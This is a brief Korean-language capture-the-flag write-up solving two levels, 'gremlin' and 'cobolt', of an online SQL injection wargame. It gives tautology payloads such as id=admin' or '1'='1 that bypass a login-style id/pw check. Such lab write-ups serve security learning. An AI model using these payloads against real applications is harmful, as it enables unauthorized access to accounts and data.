[LOS] - gremlin / cobolt

https://los.rubiya.kr/gate.php

---

gremlin

SQL 인젝션을 이용하여 쿼리문이 항상 true를 반환할 수 있도록 id와 pw의 인자를 조작할 것이다.

select id from prob_gremlin where id='1' or '1' and pw='1' or '1'

---

cobolt

보면 and pw=md5('{$_GET[pw]}' 를 무시시키고 참으로 만들면 되는 것을 알 수 있다.

?id=admin' or '1'='1